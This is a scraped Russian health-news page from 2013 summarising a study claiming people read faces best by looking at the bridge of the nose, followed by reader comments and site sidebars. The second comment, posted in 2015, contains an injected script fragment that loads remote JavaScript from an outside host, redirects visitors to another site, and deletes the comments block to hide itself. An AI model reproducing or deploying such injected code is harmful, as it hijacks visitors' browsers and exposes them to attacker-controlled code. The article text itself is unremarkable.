Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Куда надо смотреть, чтобы...  >>  Куда надо смотреть, чтобы понять, что думает человек
 
Обратная связь
 

Куда надо смотреть, чтобы понять, что думает человек

Размер шрифта
14 марта 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Говорят, что глаза – это зеркало души. Однако американские ученые считают иначе: чтобы понять человека, нужно смотреть не в глаза, а на переносицу.

как понять по взгляду мысли

В ходе проведения исследования ученые проанализировали, куда направлен взгляд человека в момент первого знакомства, когда он пытается понять, кто перед ним находится. Оказалось, что большинство людей смотрят не в глаза, а на переносицу. Несмотря на то, что мы не осознаем, на какую часть лица направлен наш взгляд, в головном мозге имеется четкая программа, регулирующая движения глаз.

Когда мы смотрим на другого человека, мы получаем информацию не только от глаз, но и от других частей лица, например, от носа и рта. Тем не менее, когда участников исследования попросили определить пол и эмоциональное состояние собеседника по любой черте лица, лучше всего у них получалось это делать, когда они смотрели на участки, расположенные близко к глазам.

В конечном итоге, ученые пришли к выводу, что максимальное количество информации о человеке можно получить, если смотреть на его переносицу. Именно в этом месте содержится самая ценная информация, которая будет обработана в центральной части сетчатки с максимальной разрешающей способностью, тогда как другие черты лица не требует столь пристального внимания и могут быть обработаны в периферических участках сетчатки в меньшей разрешающей способностью.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 марта 2013 в 11:38

Цитировать   |   Пожаловаться

 Ну многие "всем знакомые люди" говорили что и по руке могут предсказывать будущее.

2 - zzzzzz

30 июня 2015 в 23:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что говорят про мужчин с большими руками? А с большим носом?   А вы защищены от микробов   Прокол носа – жуткая вещь   Ваши сопли скажут, сумасшедший ли вы  

Слайдшоу

1
Лечение гайморита
Симптомы болезней у маленьких детей
10 признаков разбушевавшейся аллергии

Тесты

Контрольная по носу
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.